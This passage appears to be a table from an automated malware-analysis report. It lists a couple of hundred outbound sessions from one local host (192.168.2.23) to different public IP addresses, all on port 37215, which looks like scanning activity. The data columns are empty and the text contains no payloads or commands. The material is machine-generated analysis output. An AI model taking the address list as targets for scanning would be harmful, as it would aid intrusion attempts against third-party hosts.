                                          13732192.168.2.2348946157.158.152.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13733192.168.2.2335986197.57.158.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13734192.168.2.234245861.25.96.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13735192.168.2.2340226197.83.153.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13736192.168.2.233587241.21.163.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13737192.168.2.2357328197.235.88.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13738192.168.2.2344184196.28.28.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13739192.168.2.2348504188.152.8.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13740192.168.2.2334698129.49.245.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13741192.168.2.235415641.14.245.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13742192.168.2.235117259.184.22.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13743192.168.2.2345178197.139.151.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13744192.168.2.233540441.246.108.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13745192.168.2.2353494157.191.154.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13746192.168.2.2357052157.153.94.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13747192.168.2.2333260157.107.52.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13748192.168.2.2344174209.116.248.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13749192.168.2.2360546197.91.91.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13750192.168.2.2356832197.135.113.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13751192.168.2.233336267.118.1.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13752192.168.2.234502686.52.175.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13753192.168.2.2342400157.164.61.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13754192.168.2.235043841.160.77.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13755192.168.2.2349204166.168.187.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13756192.168.2.235062841.35.43.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13757192.168.2.23430189.92.50.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13758192.168.2.2341326197.57.27.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13759192.168.2.235294863.247.165.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13760192.168.2.233703040.100.90.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13761192.168.2.2340046157.64.164.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13762192.168.2.233743241.216.92.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13763192.168.2.2354100157.130.223.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13764192.168.2.2336228157.189.68.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13765192.168.2.2337738157.16.63.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13766192.168.2.2359478121.34.199.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13767192.168.2.2343734197.188.168.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13768192.168.2.234962441.43.204.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13769192.168.2.234082241.152.81.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13770192.168.2.2352228197.186.252.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13771192.168.2.2343436197.165.62.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13772192.168.2.2332988157.8.116.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13773192.168.2.234153241.69.223.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13774192.168.2.2342954197.66.155.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13775192.168.2.233947667.12.194.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13776192.168.2.2334886197.92.51.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13777192.168.2.2332946157.110.113.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13778192.168.2.2347524222.4.114.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13779192.168.2.2355212157.65.83.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13780192.168.2.2360788157.234.113.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13781192.168.2.2358644197.248.10.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13782192.168.2.233879641.231.121.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13783192.168.2.2357300197.77.204.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13784192.168.2.234432041.196.53.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13785192.168.2.2354574197.67.39.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13786192.168.2.2357976157.248.191.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13787192.168.2.2339856197.93.46.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13788192.168.2.234003859.145.48.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13789192.168.2.234240041.190.173.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13790192.168.2.2359058157.4.46.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13791192.168.2.233499641.61.11.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13792192.168.2.2352288197.157.143.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13793192.168.2.2340136157.202.76.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13794192.168.2.2337706157.75.203.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13795192.168.2.234525645.94.27.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13796192.168.2.2337512133.69.192.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13797192.168.2.2337032157.142.168.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13798192.168.2.2350564216.206.79.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13799192.168.2.234378441.104.181.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13800192.168.2.2359024157.156.127.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13801192.168.2.235131641.60.190.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13802192.168.2.2334870157.111.112.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13803192.168.2.2360602197.9.143.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13804192.168.2.2354820197.90.164.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13805192.168.2.2344796197.238.234.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13806192.168.2.2335398181.211.159.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13807192.168.2.2333156197.219.54.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13808192.168.2.2355236157.9.19.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13809192.168.2.235701641.48.162.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13810192.168.2.2333922197.44.103.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13811192.168.2.234882841.14.89.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13812192.168.2.2360532197.84.53.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13813192.168.2.2338284186.43.101.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13814192.168.2.235287241.140.79.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13815192.168.2.2348416157.99.10.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13816192.168.2.2350474157.33.202.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13817192.168.2.2348628157.231.35.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13818192.168.2.2344974104.242.123.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13819192.168.2.2344990157.150.160.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13820192.168.2.2348526157.180.189.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13821192.168.2.2338168157.145.9.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13822192.168.2.234654874.58.169.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13823192.168.2.2357252157.189.35.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13824192.168.2.2354504209.200.35.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13825192.168.2.235900266.86.117.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13826192.168.2.2332888157.92.196.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13827192.168.2.2353898197.189.118.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13828192.168.2.235778041.79.74.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13829192.168.2.2341978197.42.209.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13830192.168.2.2352316157.80.189.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13831192.168.2.2337850197.175.157.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13832192.168.2.233537841.169.57.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13833192.168.2.2354074157.88.150.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13834192.168.2.2343954197.116.36.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13835192.168.2.2333736145.224.160.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13836192.168.2.2354340157.21.31.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13837192.168.2.2358508169.50.253.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13838192.168.2.236017641.151.163.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13839192.168.2.2346976157.121.31.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13840192.168.2.234277241.143.201.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13841192.168.2.235786841.248.29.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13842192.168.2.2339986157.70.79.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13843192.168.2.235238014.207.253.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13844192.168.2.2346420140.118.186.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13845192.168.2.234300441.66.159.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13846192.168.2.233414241.249.41.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13847192.168.2.2359180197.23.28.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13848192.168.2.2344098197.165.128.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13849192.168.2.234700041.76.252.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13850192.168.2.234746299.206.16.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13851192.168.2.2344330157.90.232.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13852192.168.2.2343276157.211.138.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13853192.168.2.234524441.148.99.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13854192.168.2.233781841.102.82.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13855192.168.2.2349216157.52.20.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13856192.168.2.2346978157.70.187.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13857192.168.2.234079269.10.174.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13858192.168.2.235153641.235.70.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13859192.168.2.2353870157.80.217.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13860192.168.2.2349878157.204.15.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13861192.168.2.235478241.222.98.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13862192.168.2.2359374157.96.239.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13863192.168.2.234921241.111.76.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13864192.168.2.2346416157.185.155.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13865192.168.2.2354040197.117.162.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13866192.168.2.235652641.76.109.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13867192.168.2.234573841.101.134.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13868192.168.2.233656041.213.140.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13869192.168.2.2344484151.87.241.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13870192.168.2.2341192193.103.94.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13871192.168.2.234450082.25.44.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13872192.168.2.2347558157.240.28.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13873192.168.2.2347206105.254.98.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13874192.168.2.234273241.137.244.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13875192.168.2.2337230157.201.131.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13876192.168.2.235006641.115.13.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13877192.168.2.2355972185.145.226.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13878192.168.2.2346786197.31.141.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13879192.168.2.2354470219.239.251.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13880192.168.2.2348364157.175.47.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13881192.168.2.2333454205.14.47.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13882192.168.2.234630641.31.65.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13883192.168.2.2356892157.31.140.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13884192.168.2.235610841.96.225.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13885192.168.2.2334680197.205.75.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13886192.168.2.233451841.35.232.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13887192.168.2.235180650.162.160.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13888192.168.2.2351482197.24.64.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13889192.168.2.2335726157.204.142.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13890192.168.2.2348310126.202.111.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13891192.168.2.2353080157.109.92.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13892192.168.2.2355128200.132.108.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13893192.168.2.235552241.9.179.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13894192.168.2.2358486197.60.144.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13895192.168.2.233798484.250.168.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13896192.168.2.2344514157.180.10.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13897192.168.2.233812641.28.86.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13898192.168.2.2351852157.83.82.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13899192.168.2.2352248194.17.11.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13900192.168.2.235598041.134.131.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13901192.168.2.2341854151.204.20.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13902192.168.2.2334334194.176.82.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13903192.168.2.2333800157.165.146.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13904192.168.2.2333884163.142.151.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13905192.168.2.235634241.92.13.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13906192.168.2.234504441.223.20.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13907192.168.2.233289041.214.151.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13908192.168.2.2339774138.212.97.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13909192.168.2.233584241.238.59.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13910192.168.2.235206441.133.232.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13911192.168.2.2347418148.149.20.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13912192.168.2.234638041.79.53.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13913192.168.2.2350704197.150.14.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13914192.168.2.236097641.179.241.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13915192.168.2.235081293.163.29.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13916192.168.2.2344596197.46.103.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13917192.168.2.2360624197.30.49.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13918192.168.2.234524641.40.103.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13919192.168.2.2356184157.33.49.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13920192.168.2.2333038157.82.136.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13921192.168.2.2348632197.233.32.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13922192.168.2.234114041.60.17.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13923192.168.2.2342838197.214.231.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13924192.168.2.2341190197.21.139.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13925192.168.2.2334856180.27.138.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13926192.168.2.2342394197.149.222.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13927192.168.2.235365841.159.62.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13928192.168.2.2342570157.95.64.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13929192.168.2.2341968197.141.40.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13930192.168.2.2355274208.83.63.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13931192.168.2.235788841.254.199.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13932192.168.2.2356452198.34.116.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13933192.168.2.2341242197.101.49.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13934192.168.2.2360760157.178.3.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13935192.168.2.235268692.215.231.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13936192.168.2.2358188157.117.55.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13937192.168.2.234956673.98.32.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13938192.168.2.233320241.64.203.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13939192.168.2.2340190197.7.238.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13940192.168.2.2339588157.214.26.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13941192.168.2.2349610157.169.184.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13942192.168.2.2333972105.235.35.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13943192.168.2.234303251.232.165.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13944192.168.2.2333694197.240.98.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13945192.168.2.2352794197.231.175.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13946192.168.2.2357458157.117.223.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13947192.168.2.235091041.231.8.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13948192.168.2.2333522217.177.21.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13949192.168.2.2353540157.20.171.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13950192.168.2.2347478187.227.242.17937215
                                          TimestampBytes transferredDirectionData


